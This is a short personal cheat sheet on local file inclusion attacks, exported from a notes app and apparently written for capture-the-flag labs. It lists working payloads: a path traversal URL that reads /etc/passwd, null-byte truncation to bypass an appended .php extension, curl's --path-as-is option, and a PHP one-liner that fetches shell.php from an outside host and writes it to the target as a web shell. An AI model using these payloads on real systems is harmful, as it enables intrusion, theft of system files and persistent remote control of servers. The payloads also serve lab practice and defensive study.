<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../style.css">
    <base target="_parent">
    <title data-trilium-title>LFI</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>LFI</h1>

      <div class="ck-content">
        <p><a href="https://daniel.haxx.se/blog/2020/07/29/curl-ootw-path-as-is/">https://daniel.haxx.se/blog/2020/07/29/curl-ootw-path-as-is/</a> </p>
        <p>use <code>curl --path-as-is</code> for <code>../../ </code> </p><pre><code class="language-text-plain">&lt;?php file_put_contents('shell.php',file_get_contents('http://10.17.17.11/shell.php')) ?&gt;
&lt;?php file_get_contents('index.php')?&gt;</code></pre>

        <p><a href="http://webapp.thm/get.php?file=../../../../etc/passwd"><span style="background-color:rgba(135,131,120,0.15);color:rgb(235,87,87)">http://webapp.thm/get.php?file=../../../../etc/passwd</span></a>

        </p>
        <p><span style="background-color:rgba(135,131,120,0.15);color:rgb(235,87,87)">file_get_contents  in PHP allows LFI. also includes function</span>

        </p>
        <p><span style="background-color:rgba(135,131,120,0.15);color:rgb(235,87,87)">If server adds a .php extension at the end of file use %00(null byte) to escape the .php extension</span>

        </p>
        <p><span style="background-color:rgba(135,131,120,0.15);color:rgb(235,87,87)">../../../../etc/flag2%00 </span>

        </p>
        <p><span style="background-color:rgba(135,131,120,0.15);color:rgb(235,87,87)">try changing request type from get to post to see if it accepts payload</span>

        </p>
        <p> </p>
        <p> </p>
      </div>
    </div>
  </body>

</html>